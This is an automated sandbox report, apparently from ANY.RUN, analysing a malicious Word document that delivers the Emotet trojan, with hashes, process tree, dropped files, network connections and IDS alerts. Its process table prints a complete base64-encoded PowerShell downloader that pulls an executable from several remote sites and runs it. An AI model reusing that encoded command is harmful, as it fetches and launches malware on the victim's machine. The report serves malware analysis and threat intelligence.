File name: | BL_B5HP885M08_HB.doc |
Full analysis: | https://app.any.run/tasks/3bdf63a3-755a-4819-ad82-5dc24b75afb7 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 18, 2019, 20:06:39 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Tasty Wooden Mouse Legacy Handcrafted, Subject: Intelligent Granite Bike, Author: Ezekiel Dare, Comments: connect, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 15:32:00 2019, Last Saved Time/Date: Wed Sep 18 15:32:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0 |
MD5: | 2792353F03A08766D5A8A5CFCDC11755 |
SHA1: | 3B9A6EF019994990FA79B8FD063BFD4AF8746672 |
SHA256: | 7B2142363813A41FD3A512CA6BBD2E3D73D274558F58CA990D78A1537EBFCBD8 |
SSDEEP: | 6144:VC1qmTgpbxDj2kCUSfp400TPLkIq7NSU4jJntATfDxBlPi75:VC1qmTgpbxDj2kCUSfp400/Xq7NSU4Vp |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Tasty Wooden Mouse Legacy Handcrafted |
---|---|
Subject: | Intelligent Granite Bike |
Author: | Ezekiel Dare |
Keywords: | - |
Comments: | connect |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:09:18 14:32:00 |
ModifyDate: | 2019:09:18 14:32:00 |
Pages: | 1 |
Words: | 95 |
Characters: | 547 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Roberts - Lebsack |
Lines: | 4 |
Paragraphs: | 1 |
CharCountWithSpaces: | 641 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Parker |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3564 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\BL_B5HP885M08_HB.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
2336 | powershell -encod JABQAGEAaQAxAFUAaQAxADMAPQAnAHAAQQBUAGMAUwBqAGwAJwA7ACQAdwBpAGEAWQBXAEUAIAA9ACAAJwAxADMAMwAnADsAJABqAEwAXwBLAG4AUwBaADIAPQAnAGQAYgB0AFoARAAzAHUAaQAnADsAJABHADIAdwB2AEEATwBDAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB3AGkAYQBZAFcARQArACcALgBlAHgAZQAnADsAJAB6ADUARQB3AE8AMgB2AD0AJwBzAHoATwBHAFAASwAnADsAJABRADgAawB6AGoAegAwAD0AJgAoACcAbgBlAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABuAGUAVAAuAHcAZQBCAGMAbABJAEUAbgBUADsAJABuAGIATABPAE4AZABXAFYAPQAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHAAYQB0AHIAaQBjAGsAZwBsAG8AYgBhAGwAdQBzAGEALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGYAUwBSAGsAQQBGAGoAcQB2AC8AQABoAHQAdABwAHMAOgAvAC8AcABpAHAAaQB6AGgAYQBuAHoAaABhAG4AZwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AMwBjAGkAbwByAG4AegBfAGkAdQBsAGEAeQBzAGMAegAtADYANwA5ADYANAA2AC8AQABoAHQAdABwAHMAOgAvAC8AdABhAG4AawBoAG8AaQAuAHYAbgAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFgAVABTAHUAZwB6AE4AYQB6AC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBzAHUAcABlAHIAYwByAHkAcwB0AGEAbAAuAGEAbQAvAHcAcAAtAGEAZABtAGkAbgAvAFAAZABNAEkAbgBTAGcAcwAvAEAAaAB0AHQAcABzADoALwAvAGgAbwB0AGUAbAAtAGIAcgBpAHMAdABvAGwALgBsAHUALwBkAGwAcgB5AC8ATQBBAG4ASgBJAFAAbgBZAC8AJwAuACIAUwBwAGAAbABpAHQAIgAoACcAQAAnACkAOwAkAFEATgBCAEUAXwByADkAPQAnAE8ANQBaAGEAMQBDAFUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFMANgBmADgAUgBXAFIAIABpAG4AIAAkAG4AYgBMAE8ATgBkAFcAVgApAHsAdAByAHkAewAkAFEAOABrAHoAagB6ADAALgAiAGQAYABPAFcAYABOAGwATwBBAEQAYABGAGkATABFACIAKAAkAFMANgBmADgAUgBXAFIALAAgACQARwAyAHcAdgBBAE8AQwApADsAJABwAEgATAA3AHcAaAA9ACcAUQBMAFYAVgBkAFAAOAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEcAMgB3AHYAQQBPAEMAKQAuACIATABFAGAATgBHAFQASAAiACAALQBnAGUAIAAyADgAOAAwADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AEEAYABSAFQAIgAoACQARwAyAHcAdgBBAE8AQwApADsAJABvAFMAOQBNAEcAOQAzAD0AJwBFADEAQgB1ADYAagBPAFgAJwA7AGIAcgBlAGEAawA7ACQAVABiAGYASgBhAFkAPQAnAEIAegBwAGMAXwBaAHMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARABtAEEATwBFAE4APQAnAG0AUgBiAGIAMQBQADMAOAAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2576 | "C:\Users\admin\133.exe" | C:\Users\admin\133.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3812 | "C:\Users\admin\133.exe" | C:\Users\admin\133.exe | — | 133.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
4016 | --8ddf1eef | C:\Users\admin\133.exe | — | 133.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2764 | --8ddf1eef | C:\Users\admin\133.exe | 133.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
552 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | 133.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2980 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3076 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3672 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | easywindow.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
3564 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9B99.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3564 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\BL_B5HP885M08_HB.doc.LNK | lnk | |
MD5:930D977E5284E2928DD8793A2934CD39 | SHA256:21B757462FE75C8D796324413C61BD7D78FF7E13B5B2EEF08F5740849A21E030 | |||
3564 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F04BF2A.wmf | wmf | |
MD5:E7371AAF6E2069BF5A62504621DBB16B | SHA256:88F638AA35D457272EDE0EF04828FC1234A1C692F1D4A6A5FC8C61AAEA84AF84 | |||
3564 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D98B4DC2.wmf | wmf | |
MD5:E275B9D39B1EE83BDACD6FD0FEDC7E9F | SHA256:C734B66B3F0C0B1909E374AFD300BF413C97FC5BC0AF78AFC05A522921B8C31C | |||
3564 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F23D328D.wmf | wmf | |
MD5:2353260EC885C3A98A6C89D22AFF1248 | SHA256:E5117450EB7E41006FA9842A34889226A089FD0434E1EB70E9A3FAEE5353B13C | |||
3564 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\461EB0C8.wmf | wmf | |
MD5:73658496962CE3CEF198A29B1E1E6875 | SHA256:AD0827A843CFFE953C2634A18077B0428A60B4024285CA199601F031708A54D3 | |||
3564 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1D717320.wmf | wmf | |
MD5:9C82C46ADD9E05F1EC26C90EBED6FC3B | SHA256:4C3302B7DD579D9D80E452B882FFA141A763B87681B67A71F28AECC69CCD5CBF | |||
3564 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F5A3FA16.wmf | wmf | |
MD5:15D50A1E4FACE721563EEE94D5413CE8 | SHA256:D1EAF8F0F79906A21F24340A041CCACBB0568324110E08B90E003C6ECEB81091 | |||
3564 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D86AA29.wmf | wmf | |
MD5:B419C90F42F3A4C5D5601F2F63E4E4C0 | SHA256:06874DA9DB510979C840838C515DD39001F605663AB249CB831FB165E93249E7 | |||
3564 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:FC520A0524A7464A2C3BD220271713B6 | SHA256:8C3EFC362C48D763D6E101C6C7AA087A85F5EA0C06F23A1F62DD4F64810B3775 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3672 | easywindow.exe | POST | 200 | 190.18.146.70:80 | http://190.18.146.70/site/ | AR | binary | 148 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 190.18.146.70:80 | — | CABLEVISION S.A. | AR | malicious |
2336 | powershell.exe | 111.67.206.122:443 | pipizhanzhang.com | China Unicom Beijing Province Network | CN | unknown |
2336 | powershell.exe | 148.251.180.153:443 | www.patrickglobalusa.com | Hetzner Online GmbH | DE | malicious |
Domain | IP | Reputation |
---|---|---|
www.patrickglobalusa.com |
| malicious |
pipizhanzhang.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
3672 | easywindow.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
3672 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |